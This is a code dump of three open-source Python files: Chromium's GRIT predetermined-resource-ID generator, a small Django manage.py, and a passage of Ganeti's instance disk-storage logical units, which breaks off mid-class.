"name": "Python",
"bytes": "256278"
}
],
"symlink_target": ""
}
|
"""
A tool to generate a predetermined resource ids file that can be used as an
input to grit via the -p option. This is meant to be run manually every once in
a while and its output checked in. See tools/gritsettings/README.md for details.
"""
from __future__ import print_function
import os
import re
import sys
# Regular expression for parsing the #define macro format. Matches both the
# version of the macro with whitelist support and the one without. For example,
# Without generate whitelist flag:
# #define IDS_FOO_MESSAGE 1234
# With generate whitelist flag:
# #define IDS_FOO_MESSAGE (::ui::WhitelistedResource<1234>(), 1234)
RESOURCE_EXTRACT_REGEX = re.compile(r'^#define (\S*).* (\d+)\)?$', re.MULTILINE)
ORDERED_RESOURCE_IDS_REGEX = re.compile(r'^Resource=(\d*)$', re.MULTILINE)
def _GetResourceNameIdPairsIter(string_to_scan):
"""Gets an iterator of the resource name and id pairs of the given string.
Scans the input string for lines of the form "#define NAME ID" and returns
an iterator over all matching (NAME, ID) pairs.
Args:
string_to_scan: The input string to scan.
Yields:
A tuple of name and id.
"""
for match in RESOURCE_EXTRACT_REGEX.finditer(string_to_scan):
yield match.group(1, 2)
def _ReadOrderedResourceIds(path):
"""Reads ordered resource ids from the given file.
The resources are expected to be of the format produced by running Chrome
with --print-resource-ids command line.
Args:
path: File path to read resource ids from.
Returns:
An array of ordered resource ids.
"""
ordered_resource_ids = []
with open(path, "r") as f:
for match in ORDERED_RESOURCE_IDS_REGEX.finditer(f.read()):
ordered_resource_ids.append(int(match.group(1)))
return ordered_resource_ids
def GenerateResourceMapping(original_resources, ordered_resource_ids):
"""Generates a resource mapping from the ordered ids and the original mapping.
The returned dict will assign new ids to ordered_resource_ids numerically
increasing from 101.
Args:
original_resources: A dict of original resource ids to resource names.
ordered_resource_ids: An array of ordered resource ids.
Returns:
A dict of resource ids to resource names.
"""
output_resource_map = {}
# 101 is used as the starting value since other parts of GRIT require it to be
# the minimum (e.g. rc_header.py) based on Windows resource numbering.
next_id = 101
for original_id in ordered_resource_ids:
resource_name = original_resources[original_id]
output_resource_map[next_id] = resource_name
next_id += 1
return output_resource_map
def ReadResourceIdsFromFile(file, original_resources):
"""Reads resource ids from a GRIT-produced header file.
Args:
file: File to a GRIT-produced header file to read from.
original_resources: Dict of resource ids to resource names to add to.
"""
for resource_name, resource_id in _GetResourceNameIdPairsIter(file.read()):
original_resources[int(resource_id)] = resource_name
def _ReadOriginalResourceIds(out_dir):
"""Reads resource ids from GRIT header files in the specified directory.
Args:
out_dir: A Chrome build output directory (e.g. out/gn) to scan.
Returns:
A dict of resource ids to resource names.
"""
original_resources = {}
for root, dirnames, filenames in os.walk(out_dir + '/gen'):
for filename in filenames:
if filename.endswith(('_resources.h', '_settings.h', '_strings.h')):
with open(os.path.join(root, filename), "r") as f:
ReadResourceIdsFromFile(f, original_resources)
return original_resources
def _GeneratePredeterminedIdsFile(ordered_resources_file, out_dir):
"""Generates a predetermined ids file.
Args:
ordered_resources_file: File path to read ordered resource ids from.
out_dir: A Chrome build output directory (e.g. out/gn) to scan.
Returns:
A dict of resource ids to resource names.
"""
original_resources = _ReadOriginalResourceIds(out_dir)
ordered_resource_ids = _ReadOrderedResourceIds(ordered_resources_file)
output_resource_map = GenerateResourceMapping(original_resources,
ordered_resource_ids)
for res_id in sorted(output_resource_map.keys()):
print(output_resource_map[res_id], res_id)
def main(argv):
if len(argv) != 2:
print("usage: gen_predetermined_ids.py <ordered_resources_file> <out_dir>")
sys.exit(1)
ordered_resources_file, out_dir = argv[0], argv[1]
_GeneratePredeterminedIdsFile(ordered_resources_file, out_dir)
if '__main__' == __name__:
main(sys.argv[1:])
|
{
"content_hash": "72ae91c11efb659afd9664671fa165ef",
"timestamp": "",
"source": "github",
"line_count": 139,
"max_line_length": 80,
"avg_line_length": 33.18705035971223,
"alnum_prop": 0.7129850422718405,
"repo_name": "endlessm/chromium-browser",
"id": "9b2aa7b1a578155b5af5ddc650d4a54e8f8500e3",
"size": "4798",
"binary": false,
"copies": "3",
"ref": "refs/heads/master",
"path": "tools/grit/grit/format/gen_predetermined_ids.py",
"mode": "33261",
"license": "bsd-3-clause",
"language": [],
"symlink_target": ""
}
|
import os
import sys
from django import http
from django.conf.urls import url
import app.views
if __name__ == "__main__":
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "personRegister.settings")
from django.core.management import execute_from_command_line
execute_from_command_line(sys.argv)
def index(request):
return http("Hello world!")
|
{
"content_hash": "bdcb0140b956461dbe982e0a30bb7d38",
"timestamp": "",
"source": "github",
"line_count": 14,
"max_line_length": 78,
"avg_line_length": 25.785714285714285,
"alnum_prop": 0.7340720221606648,
"repo_name": "aprendist-repo/test",
"id": "35aa3ad434f673c97308fef3607e98593fe4dbba",
"size": "383",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "manage.py",
"mode": "33261",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "24237"
},
{
"name": "HTML",
"bytes": "13443"
},
{
"name": "JavaScript",
"bytes": "15951"
},
{
"name": "Python",
"bytes": "4763"
}
],
"symlink_target": ""
}
|
"""Logical units dealing with storage of instances."""
import itertools
import logging
import os
import time
from ganeti import compat
from ganeti import constants
from ganeti import errors
from ganeti import ht
from ganeti import locking
from ganeti.masterd import iallocator
from ganeti import objects
from ganeti import utils
import ganeti.rpc.node as rpc
from ganeti.cmdlib.base import LogicalUnit, NoHooksLU, Tasklet
from ganeti.cmdlib.common import INSTANCE_DOWN, INSTANCE_NOT_RUNNING, \
AnnotateDiskParams, CheckIAllocatorOrNode, ExpandNodeUuidAndName, \
ComputeIPolicyDiskSizesViolation, \
CheckNodeOnline, CheckInstanceNodeGroups, CheckInstanceState, \
IsExclusiveStorageEnabledNode, FindFaultyInstanceDisks, GetWantedNodes, \
CheckDiskTemplateEnabled
from ganeti.cmdlib.instance_utils import GetInstanceInfoText, \
CopyLockList, ReleaseLocks, CheckNodeVmCapable, \
BuildInstanceHookEnvByObject, CheckNodeNotDrained, CheckTargetNodeIPolicy
import ganeti.masterd.instance
_DISK_TEMPLATE_NAME_PREFIX = {
constants.DT_PLAIN: "",
constants.DT_RBD: ".rbd",
constants.DT_EXT: ".ext",
constants.DT_FILE: ".file",
constants.DT_SHARED_FILE: ".sharedfile",
}
def CreateSingleBlockDev(lu, node_uuid, instance, device, info, force_open,
excl_stor):
"""Create a single block device on a given node.
This will not recurse over children of the device, so they must be
created in advance.
@param lu: the lu on whose behalf we execute
@param node_uuid: the node on which to create the device
@type instance: L{objects.Instance}
@param instance: the instance which owns the device
@type device: L{objects.Disk}
@param device: the device to create
@param info: the extra 'metadata' we should attach to the device
(this will be represented as a LVM tag)
@type force_open: boolean
@param force_open: this parameter will be passes to the
L{backend.BlockdevCreate} function where it specifies
whether we run on primary or not, and it affects both
the child assembly and the device own Open() execution
@type excl_stor: boolean
@param excl_stor: Whether exclusive_storage is active for the node
"""
result = lu.rpc.call_blockdev_create(node_uuid, (device, instance),
device.size, instance.name, force_open,
info, excl_stor)
result.Raise("Can't create block device %s on"
" node %s for instance %s" % (device,
lu.cfg.GetNodeName(node_uuid),
instance.name))
def _CreateBlockDevInner(lu, node_uuid, instance, device, force_create,
info, force_open, excl_stor):
"""Create a tree of block devices on a given node.
If this device type has to be created on secondaries, create it and
all its children.
If not, just recurse to children keeping the same 'force' value.
@attention: The device has to be annotated already.
@param lu: the lu on whose behalf we execute
@param node_uuid: the node on which to create the device
@type instance: L{objects.Instance}
@param instance: the instance which owns the device
@type device: L{objects.Disk}
@param device: the device to create
@type force_create: boolean
@param force_create: whether to force creation of this device; this
will be change to True whenever we find a device which has
CreateOnSecondary() attribute
@param info: the extra 'metadata' we should attach to the device
(this will be represented as a LVM tag)
@type force_open: boolean
@param force_open: this parameter will be passes to the
L{backend.BlockdevCreate} function where it specifies
whether we run on primary or not, and it affects both
the child assembly and the device own Open() execution
@type excl_stor: boolean
@param excl_stor: Whether exclusive_storage is active for the node
@return: list of created devices
"""
created_devices = []
try:
if device.CreateOnSecondary():
force_create = True
if device.children:
for child in device.children:
devs = _CreateBlockDevInner(lu, node_uuid, instance, child,
force_create, info, force_open, excl_stor)
created_devices.extend(devs)
if not force_create:
return created_devices
CreateSingleBlockDev(lu, node_uuid, instance, device, info, force_open,
excl_stor)
# The device has been completely created, so there is no point in keeping
# its subdevices in the list. We just add the device itself instead.
created_devices = [(node_uuid, device)]
return created_devices
except errors.DeviceCreationError, e:
e.created_devices.extend(created_devices)
raise e
except errors.OpExecError, e:
raise errors.DeviceCreationError(str(e), created_devices)
def IsExclusiveStorageEnabledNodeUuid(cfg, node_uuid):
"""Whether exclusive_storage is in effect for the given node.
@type cfg: L{config.ConfigWriter}
@param cfg: The cluster configuration
@type node_uuid: string
@param node_uuid: The node UUID
@rtype: bool
@return: The effective value of exclusive_storage
@raise errors.OpPrereqError: if no node exists with the given name
"""
ni = cfg.GetNodeInfo(node_uuid)
if ni is None:
raise errors.OpPrereqError("Invalid node UUID %s" % node_uuid,
errors.ECODE_NOENT)
return IsExclusiveStorageEnabledNode(cfg, ni)
def _CreateBlockDev(lu, node_uuid, instance, device, force_create, info,
force_open):
"""Wrapper around L{_CreateBlockDevInner}.
This method annotates the root device first.
"""
(disk,) = AnnotateDiskParams(instance, [device], lu.cfg)
excl_stor = IsExclusiveStorageEnabledNodeUuid(lu.cfg, node_uuid)
return _CreateBlockDevInner(lu, node_uuid, instance, disk, force_create, info,
force_open, excl_stor)
def _UndoCreateDisks(lu, disks_created, instance):
"""Undo the work performed by L{CreateDisks}.
This function is called in case of an error to undo the work of
L{CreateDisks}.
@type lu: L{LogicalUnit}
@param lu: the logical unit on whose behalf we execute
@param disks_created: the result returned by L{CreateDisks}
@type instance: L{objects.Instance}
@param instance: the instance for which disks were created
"""
for (node_uuid, disk) in disks_created:
result = lu.rpc.call_blockdev_remove(node_uuid, (disk, instance))
result.Warn("Failed to remove newly-created disk %s on node %s" %
(disk, lu.cfg.GetNodeName(node_uuid)), logging.warning)
def CreateDisks(lu, instance, disk_template=None,
to_skip=None, target_node_uuid=None, disks=None):
"""Create all disks for an instance.
This abstracts away some work from AddInstance.
Since the instance may not have been saved to the config file yet, this
function can not query the config file for the instance's disks; in that
case they need to be passed as an argument.
This function is also used by the disk template conversion mechanism to
create the new disks of the instance. Since the instance will have the
old template at the time we create the new disks, the new template must
be passed as an extra argument.
@type lu: L{LogicalUnit}
@param lu: the logical unit on whose behalf we execute
@type instance: L{objects.Instance}
@param instance: the instance whose disks we should create
@type disk_template: string
@param disk_template: if provided, overrides the instance's disk_template
@type to_skip: list
@param to_skip: list of indices to skip
@type target_node_uuid: string
@param target_node_uuid: if passed, overrides the target node for creation
@type disks: list of {objects.Disk}
@param disks: the disks to create; if not specified, all the disks of the
instance are created
@return: information about the created disks, to be used to call
L{_UndoCreateDisks}
@raise errors.OpPrereqError: in case of error
"""
info = GetInstanceInfoText(instance)
if disks is None:
disks = lu.cfg.GetInstanceDisks(instance.uuid)
if target_node_uuid is None:
pnode_uuid = instance.primary_node
# We cannot use config's 'GetInstanceNodes' here as 'CreateDisks'
# is used by 'LUInstanceCreate' and the instance object is not
# stored in the config yet.
all_node_uuids = []
for disk in disks:
all_node_uuids.extend(disk.all_nodes)
all_node_uuids = set(all_node_uuids)
# ensure that primary node is always the first
all_node_uuids.discard(pnode_uuid)
all_node_uuids = [pnode_uuid] + list(all_node_uuids)
else:
pnode_uuid = target_node_uuid
all_node_uuids = [pnode_uuid]
if disk_template is None:
disk_template = utils.GetDiskTemplate(disks)
if disk_template == constants.DT_MIXED:
raise errors.OpExecError("Creating disk for '%s' instances "
"only possible with explicit disk template."
% (constants.DT_MIXED,))
CheckDiskTemplateEnabled(lu.cfg.GetClusterInfo(), disk_template)
if disk_template in constants.DTS_FILEBASED:
file_storage_dir = os.path.dirname(disks[0].logical_id[1])
result = lu.rpc.call_file_storage_dir_create(pnode_uuid, file_storage_dir)
result.Raise("Failed to create directory '%s' on"
" node %s" % (file_storage_dir,
lu.cfg.GetNodeName(pnode_uuid)))
disks_created = []
for idx, device in enumerate(disks):
if to_skip and idx in to_skip:
continue
logging.info("Creating disk %s for instance '%s'", idx, instance.name)
for node_uuid in all_node_uuids:
f_create = node_uuid == pnode_uuid
try:
_CreateBlockDev(lu, node_uuid, instance, device, f_create, info,
f_create)
disks_created.append((node_uuid, device))
except errors.DeviceCreationError, e:
logging.warning("Creating disk %s for instance '%s' failed",
idx, instance.name)
disks_created.extend(e.created_devices)
_UndoCreateDisks(lu, disks_created, instance)
raise errors.OpExecError(e.message)
return disks_created
def ComputeDiskSizePerVG(disk_template, disks):
"""Compute disk size requirements in the volume group
"""
def _compute(disks, payload):
"""Universal algorithm.
"""
vgs = {}
for disk in disks:
vg_name = disk[constants.IDISK_VG]
vgs[vg_name] = \
vgs.get(vg_name, 0) + disk[constants.IDISK_SIZE] + payload
return vgs
# Required free disk space as a function of disk and swap space
req_size_dict = {
constants.DT_DISKLESS: {},
constants.DT_PLAIN: _compute(disks, 0),
# 128 MB are added for drbd metadata for each disk
constants.DT_DRBD8: _compute(disks, constants.DRBD_META_SIZE),
constants.DT_FILE: {},
constants.DT_SHARED_FILE: {},
constants.DT_GLUSTER: {},
}
if disk_template not in req_size_dict:
raise errors.ProgrammerError("Disk template '%s' size requirement"
" is unknown" % disk_template)
return req_size_dict[disk_template]
def ComputeDisks(disks, disk_template, default_vg):
"""Computes the instance disks.
@type disks: list of dictionaries
@param disks: The disks' input dictionary
@type disk_template: string
@param disk_template: The disk template of the instance
@type default_vg: string
@param default_vg: The default_vg to assume
@return: The computed disks
"""
new_disks = []
for disk in disks:
mode = disk.get(constants.IDISK_MODE, constants.DISK_RDWR)
if mode not in constants.DISK_ACCESS_SET:
raise errors.OpPrereqError("Invalid disk access mode '%s'" %
mode, errors.ECODE_INVAL)
size = disk.get(constants.IDISK_SIZE, None)
if size is None:
raise errors.OpPrereqError("Missing disk size", errors.ECODE_INVAL)
try:
size = int(size)
except (TypeError, ValueError):
raise errors.OpPrereqError("Invalid disk size '%s'" % size,
errors.ECODE_INVAL)
CheckDiskExtProvider(disk, disk_template)
data_vg = disk.get(constants.IDISK_VG, default_vg)
name = disk.get(constants.IDISK_NAME, None)
if name is not None and name.lower() == constants.VALUE_NONE:
name = None
new_disk = {
constants.IDISK_SIZE: size,
constants.IDISK_MODE: mode,
constants.IDISK_VG: data_vg,
constants.IDISK_NAME: name,
constants.IDISK_TYPE: disk_template,
}
for key in [
constants.IDISK_METAVG,
constants.IDISK_ADOPT,
constants.IDISK_SPINDLES,
]:
if key in disk:
new_disk[key] = disk[key]
# Add IDISK_ACCESS parameter for disk templates that support it
if (disk_template in constants.DTS_HAVE_ACCESS and
constants.IDISK_ACCESS in disk):
new_disk[constants.IDISK_ACCESS] = disk[constants.IDISK_ACCESS]
# For extstorage, demand the `provider' option and add any
# additional parameters (ext-params) to the dict
if disk_template == constants.DT_EXT:
new_disk[constants.IDISK_PROVIDER] = disk[constants.IDISK_PROVIDER]
for key in disk:
if key not in constants.IDISK_PARAMS:
new_disk[key] = disk[key]
new_disks.append(new_disk)
return new_disks
def ComputeDisksInfo(disks, disk_template, default_vg, ext_params):
"""Computes the new instance's disks for the template conversion.
This method is used by the disks template conversion mechanism. Using the
'ComputeDisks' method as an auxiliary method computes the disks that will be
used for generating the new disk template of the instance. It computes the
size, mode, and name parameters from the instance's current disks, such as
the volume group and the access parameters for the templates that support
them. For conversions targeting an extstorage template, the mandatory
provider's name or any user-provided extstorage parameters will also be
included in the result.
@type disks: list of {objects.Disk}
@param disks: The current disks of the instance
@type disk_template: string
@param disk_template: The disk template of the instance
@type default_vg: string
@param default_vg: The default volume group to assume
@type ext_params: dict
@param ext_params: The extstorage parameters
@rtype: list of dictionaries
@return: The computed disks' information for the new template
"""
# Ensure 'ext_params' does not violate existing disks' params
for key in ext_params.keys():
if key != constants.IDISK_PROVIDER:
assert key not in constants.IDISK_PARAMS, \
"Invalid extstorage parameter '%s'" % key
# Prepare the disks argument for the 'ComputeDisks' method.
inst_disks = [dict((key, value) for key, value in disk.iteritems()
if key in constants.IDISK_PARAMS)
for disk in map(objects.Disk.ToDict, disks)]
# Update disks with the user-provided 'ext_params'.
for disk in inst_disks:
disk.update(ext_params)
# Compute the new disks' information.
new_disks = ComputeDisks(inst_disks, disk_template, default_vg)
# Add missing parameters to the previously computed disks.
for disk, new_disk in zip(disks, new_disks):
# Conversions between ExtStorage templates allowed only for different
# providers.
if (disk.dev_type == disk_template and
disk_template == constants.DT_EXT):
provider = new_disk[constants.IDISK_PROVIDER]
if provider == disk.params[constants.IDISK_PROVIDER]:
raise errors.OpPrereqError("Not converting, '%s' of type ExtStorage"
" already using provider '%s'" %
(disk.iv_name, provider), errors.ECODE_INVAL)
# Add IDISK_ACCESS parameter for conversions between disk templates that
# support it.
if (disk_template in constants.DTS_HAVE_ACCESS and
constants.IDISK_ACCESS in disk.params):
new_disk[constants.IDISK_ACCESS] = disk.params[constants.IDISK_ACCESS]
# For LVM-based conversions (plain <-> drbd) use the same volume group.
if disk_template in constants.DTS_LVM:
if disk.dev_type == constants.DT_PLAIN:
new_disk[constants.IDISK_VG] = disk.logical_id[0]
elif disk.dev_type == constants.DT_DRBD8:
new_disk[constants.IDISK_VG] = disk.children[0].logical_id[0]
return new_disks
def CalculateFileStorageDir(disk_type, cfg, instance_name,
file_storage_dir=None):
"""Calculate final instance file storage dir.
@type disk_type: disk template
@param disk_type: L{constants.DT_FILE}, L{constants.DT_SHARED_FILE}, or
L{constants.DT_GLUSTER}
@type cfg: ConfigWriter
@param cfg: the configuration that is to be used.
@type file_storage_dir: path
@param file_storage_dir: the path below the configured base.
@type instance_name: string
@param instance_name: name of the instance this disk is for.
@rtype: string
@return: The file storage directory for the instance
"""
# file storage dir calculation/check
instance_file_storage_dir = None
if disk_type in constants.DTS_FILEBASED:
# build the full file storage dir path
joinargs = []
cfg_storage = None
if disk_type == constants.DT_FILE:
cfg_storage = cfg.GetFileStorageDir()
elif disk_type == constants.DT_SHARED_FILE:
cfg_storage = cfg.GetSharedFileStorageDir()
elif disk_type == constants.DT_GLUSTER:
cfg_storage = cfg.GetGlusterStorageDir()
if not cfg_storage:
raise errors.OpPrereqError(
"Cluster file storage dir for {tpl} storage type not defined".format(
tpl=repr(disk_type)
),
errors.ECODE_STATE)
joinargs.append(cfg_storage)
if file_storage_dir is not None:
joinargs.append(file_storage_dir)
if disk_type != constants.DT_GLUSTER:
joinargs.append(instance_name)
if len(joinargs) > 1:
instance_file_storage_dir = utils.PathJoin(*joinargs)
else:
instance_file_storage_dir = joinargs[0]
return instance_file_storage_dir
def CheckRADOSFreeSpace():
"""Compute disk size requirements inside the RADOS cluster.
"""
# For the RADOS cluster we assume there is always enough space.
pass
def _GenerateDRBD8Branch(lu, primary_uuid, secondary_uuid, size, vgnames, names,
iv_name, forthcoming=False):
"""Generate a drbd8 device complete with its children.
"""
assert len(vgnames) == len(names) == 2
port = lu.cfg.AllocatePort()
shared_secret = lu.cfg.GenerateDRBDSecret(lu.proc.GetECId())
dev_data = objects.Disk(dev_type=constants.DT_PLAIN, size=size,
logical_id=(vgnames[0], names[0]),
nodes=[primary_uuid, secondary_uuid],
params={}, forthcoming=forthcoming)
dev_data.uuid = lu.cfg.GenerateUniqueID(lu.proc.GetECId())
dev_meta = objects.Disk(dev_type=constants.DT_PLAIN,
size=constants.DRBD_META_SIZE,
logical_id=(vgnames[1], names[1]),
nodes=[primary_uuid, secondary_uuid],
params={}, forthcoming=forthcoming)
dev_meta.uuid = lu.cfg.GenerateUniqueID(lu.proc.GetECId())
drbd_uuid = lu.cfg.GenerateUniqueID(lu.proc.GetECId())
minors = lu.cfg.AllocateDRBDMinor([primary_uuid, secondary_uuid], drbd_uuid)
assert len(minors) == 2
drbd_dev = objects.Disk(dev_type=constants.DT_DRBD8, size=size,
logical_id=(primary_uuid, secondary_uuid, port,
minors[0], minors[1],
shared_secret),
children=[dev_data, dev_meta],
nodes=[primary_uuid, secondary_uuid],
iv_name=iv_name, params={},
forthcoming=forthcoming)
drbd_dev.uuid = drbd_uuid
return drbd_dev
def GenerateDiskTemplate(
lu, template_name, instance_uuid, primary_node_uuid, secondary_node_uuids,
disk_info, file_storage_dir, file_driver, base_index,
feedback_fn, full_disk_params, forthcoming=False):
"""Generate the entire disk layout for a given template type.
"""
vgname = lu.cfg.GetVGName()
disk_count = len(disk_info)
disks = []
CheckDiskTemplateEnabled(lu.cfg.GetClusterInfo(), template_name)
if template_name == constants.DT_DISKLESS:
pass
elif template_name == constants.DT_DRBD8:
if len(secondary_node_uuids) != 1:
raise errors.ProgrammerError("Wrong template configuration")
remote_node_uuid = secondary_node_uuids[0]
drbd_params = objects.Disk.ComputeLDParams(template_name,
full_disk_params)[0]
drbd_default_metavg = drbd_params[constants.LDP_DEFAULT_METAVG]
names = []
for lv_prefix in _GenerateUniqueNames(lu, [".disk%d" % (base_index + i)
for i in range(disk_count)]):
names.append(lv_prefix + "_data")
names.append(lv_prefix + "_meta")
for idx, disk in enumerate(disk_info):
disk_index = idx + base_index
data_vg = disk.get(constants.IDISK_VG, vgname)
meta_vg = disk.get(constants.IDISK_METAVG, drbd_default_metavg)
disk_dev = _GenerateDRBD8Branch(lu, primary_node_uuid, remote_node_uuid,
disk[constants.IDISK_SIZE],
[data_vg, meta_vg],
names[idx * 2:idx * 2 + 2],
"disk/%d" % disk_index,
forthcoming=forthcoming)
disk_dev.mode = disk[constants.IDISK_MODE]
disk_dev.name = disk.get(constants.IDISK_NAME, None)
disk_dev.dev_type = template_name
disks.append(disk_dev)
else:
if secondary_node_uuids:
raise errors.ProgrammerError("Wrong template configuration")
name_prefix = _DISK_TEMPLATE_NAME_PREFIX.get(template_name, None)
if name_prefix is None:
names = None
else:
names = _GenerateUniqueNames(lu, ["%s.disk%s" %
(name_prefix, base_index + i)
for i in range(disk_count)])
disk_nodes = []
if template_name == constants.DT_PLAIN:
def logical_id_fn(idx, _, disk):
vg = disk.get(constants.IDISK_VG, vgname)
return (vg, names[idx])
disk_nodes = [primary_node_uuid]
elif template_name == constants.DT_GLUSTER:
logical_id_fn = lambda _1, disk_index, _2: \
(file_driver, "ganeti/%s.%d" % (instance_uuid,
disk_index))
elif template_name in constants.DTS_FILEBASED: # Gluster handled above
logical_id_fn = \
lambda idx, disk_index, disk: (file_driver,
"%s/%s" % (file_storage_dir,
names[idx]))
if template_name == constants.DT_FILE:
disk_nodes = [primary_node_uuid]
elif template_name == constants.DT_BLOCK:
logical_id_fn = \
lambda idx, disk_index, disk: (constants.BLOCKDEV_DRIVER_MANUAL,
disk[constants.IDISK_ADOPT])
elif template_name == constants.DT_RBD:
logical_id_fn = lambda idx, _, disk: ("rbd", names[idx])
elif template_name == constants.DT_EXT:
def logical_id_fn(idx, _, disk):
provider = disk.get(constants.IDISK_PROVIDER, None)
if provider is None:
raise errors.ProgrammerError("Disk template is %s, but '%s' is"
" not found", constants.DT_EXT,
constants.IDISK_PROVIDER)
return (provider, names[idx])
else:
raise errors.ProgrammerError("Unknown disk template '%s'" % template_name)
dev_type = template_name
for idx, disk in enumerate(disk_info):
params = {}
# Only for the Ext template add disk_info to params
if template_name == constants.DT_EXT:
params[constants.IDISK_PROVIDER] = disk[constants.IDISK_PROVIDER]
for key in disk:
if key not in constants.IDISK_PARAMS:
params[key] = disk[key]
# Add IDISK_ACCESS param to disk params
if (template_name in constants.DTS_HAVE_ACCESS and
constants.IDISK_ACCESS in disk):
params[constants.IDISK_ACCESS] = disk[constants.IDISK_ACCESS]
disk_index = idx + base_index
size = disk[constants.IDISK_SIZE]
feedback_fn("* disk %s, size %s" %
(disk_index, utils.FormatUnit(size, "h")))
disk_dev = objects.Disk(dev_type=dev_type, size=size,
logical_id=logical_id_fn(idx, disk_index, disk),
iv_name="disk/%d" % disk_index,
mode=disk[constants.IDISK_MODE],
params=params, nodes=disk_nodes,
spindles=disk.get(constants.IDISK_SPINDLES),
forthcoming=forthcoming)
disk_dev.name = disk.get(constants.IDISK_NAME, None)
disk_dev.uuid = lu.cfg.GenerateUniqueID(lu.proc.GetECId())
disks.append(disk_dev)
return disks
def CommitDisks(disks):
"""Recursively remove the forthcoming flag
"""
for disk in disks:
disk.forthcoming = False
CommitDisks(disk.children)
def CheckSpindlesExclusiveStorage(diskdict, es_flag, required):
"""Check the presence of the spindle options with exclusive_storage.
@type diskdict: dict
@param diskdict: disk parameters
@type es_flag: bool
@param es_flag: the effective value of the exlusive_storage flag
@type required: bool
@param required: whether spindles are required or just optional
@raise errors.OpPrereqError when spindles are given and they should not
"""
if (not es_flag and constants.IDISK_SPINDLES in diskdict and
diskdict[constants.IDISK_SPINDLES] is not None):
raise errors.OpPrereqError("Spindles in instance disks cannot be specified"
" when exclusive storage is not active",
errors.ECODE_INVAL)
if (es_flag and required and (constants.IDISK_SPINDLES not in diskdict or
diskdict[constants.IDISK_SPINDLES] is None)):
raise errors.OpPrereqError("You must specify spindles in instance disks"
" when exclusive storage is active",
errors.ECODE_INVAL)
def CheckDiskExtProvider(diskdict, disk_template):
"""Check that the given disk should or should not have the provider param.
@type diskdict: dict
@param diskdict: disk parameters
@type disk_template: string
@param disk_template: the desired template of this disk
@raise errors.OpPrereqError: when the parameter is used in the wrong way
"""
ext_provider = diskdict.get(constants.IDISK_PROVIDER, None)
if ext_provider and disk_template != constants.DT_EXT:
raise errors.OpPrereqError("The '%s' option is only valid for the %s"
" disk template, not %s" %
(constants.IDISK_PROVIDER, constants.DT_EXT,
disk_template), errors.ECODE_INVAL)
if ext_provider is None and disk_template == constants.DT_EXT:
raise errors.OpPrereqError("Missing provider for template '%s'" %
constants.DT_EXT, errors.ECODE_INVAL)
class LUInstanceRecreateDisks(LogicalUnit):
"""Recreate an instance's missing disks.
"""
HPATH = "instance-recreate-disks"
HTYPE = constants.HTYPE_INSTANCE
REQ_BGL = False
_MODIFYABLE = compat.UniqueFrozenset([
constants.IDISK_SIZE,
constants.IDISK_MODE,
constants.IDISK_SPINDLES,
])
# New or changed disk parameters may have different semantics
assert constants.IDISK_PARAMS == (_MODIFYABLE | frozenset([
constants.IDISK_ADOPT,
# TODO: Implement support changing VG while recreating
constants.IDISK_VG,
constants.IDISK_METAVG,
constants.IDISK_PROVIDER,
constants.IDISK_NAME,
constants.IDISK_ACCESS,
constants.IDISK_TYPE,
]))
def _RunAllocator(self):
"""Run the allocator based on input opcode.
"""
be_full = self.cfg.GetClusterInfo().FillBE(self.instance)
# FIXME
# The allocator should actually run in "relocate" mode, but current
# allocators don't support relocating all the nodes of an instance at
# the same time. As a workaround we use "allocate" mode, but this is
# suboptimal for two reasons:
# - The instance name passed to the allocator is present in the list of
# existing instances, so there could be a conflict within the
# internal structures of the allocator. This doesn't happen with the
# current allocators, but it's a liability.
# - The allocator counts the resources used by the instance twice: once
# because the instance exists already, and once because it tries to
# allocate a new instance.
# The allocator could choose some of the nodes on which the instance is
# running, but that's not a problem. If the instance nodes are broken,
# they should be already be marked as drained or offline, and hence
# skipped by the allocator. If instance disks have been lost for other
# reasons, then recreating the disks on the same nodes should be fine.
spindle_use = be_full[constants.BE_SPINDLE_USE]
disk_template = self.cfg.GetInstanceDiskTemplate(self.instance.uuid)
disks = [{
constants.IDISK_SIZE: d.size,
constants.IDISK_MODE: d.mode,
constants.IDISK_SPINDLES: d.spindles,
constants.IDISK_TYPE: d.dev_type
} for d in self.cfg.GetInstanceDisks(self.instance.uuid)]
req = iallocator.IAReqInstanceAlloc(name=self.op.instance_name,
disk_template=disk_template,
group_name=None,
tags=list(self.instance.GetTags()),
os=self.instance.os,
nics=[{}],
vcpus=be_full[constants.BE_VCPUS],
memory=be_full[constants.BE_MAXMEM],
spindle_use=spindle_use,
disks=disks,
hypervisor=self.instance.hypervisor,
node_whitelist=None)
ial = iallocator.IAllocator(self.cfg, self.rpc, req)
ial.Run(self.op.iallocator)
assert req.RequiredNodes() == \
len(self.cfg.GetInstanceNodes(self.instance.uuid))
if not ial.success:
raise errors.OpPrereqError("Can't compute nodes using iallocator '%s':"
" %s" % (self.op.iallocator, ial.info),
errors.ECODE_NORES)
(self.op.node_uuids, self.op.nodes) = GetWantedNodes(self, ial.result)
self.LogInfo("Selected nodes for instance %s via iallocator %s: %s",
self.op.instance_name, self.op.iallocator,
utils.CommaJoin(self.op.nodes))
def CheckArguments(self):
if self.op.disks and ht.TNonNegativeInt(self.op.disks[0]):
# Normalize and convert deprecated list of disk indices
self.op.disks = [(idx, {}) for idx in sorted(frozenset(self.op.disks))]
duplicates = utils.FindDuplicates(map(compat.fst, self.op.disks))
if duplicates:
raise errors.OpPrereqError("Some disks have been specified more than"
" once: %s" % utils.CommaJoin(duplicates),
errors.ECODE_INVAL)
# We don't want _CheckIAllocatorOrNode selecting the default iallocator
# when neither iallocator nor nodes are specified
if self.op.iallocator or self.op.nodes:
CheckIAllocatorOrNode(self, "iallocator", "nodes")
for (idx, params) in self.op.disks:
utils.ForceDictType(params, constants.IDISK_PARAMS_TYPES)
unsupported = frozenset(params.keys()) - self._MODIFYABLE
if unsupported:
raise errors.OpPrereqError("Parameters for disk %s try to change"
" unmodifyable parameter(s): %s" %
(idx, utils.CommaJoin(unsupported)),
errors.ECODE_INVAL)
def ExpandNames(self):
self._ExpandAndLockInstance()
self.recalculate_locks[locking.LEVEL_NODE] = constants.LOCKS_APPEND
if self.op.nodes:
(self.op.node_uuids, self.op.nodes) = GetWantedNodes(self, self.op.nodes)
self.needed_locks[locking.LEVEL_NODE] = list(self.op.node_uuids)
else:
self.needed_locks[locking.LEVEL_NODE] = []
if self.op.iallocator:
# iallocator will select a new node in the same group
self.needed_locks[locking.LEVEL_NODEGROUP] = []
self.needed_locks[locking.LEVEL_NODE_RES] = []
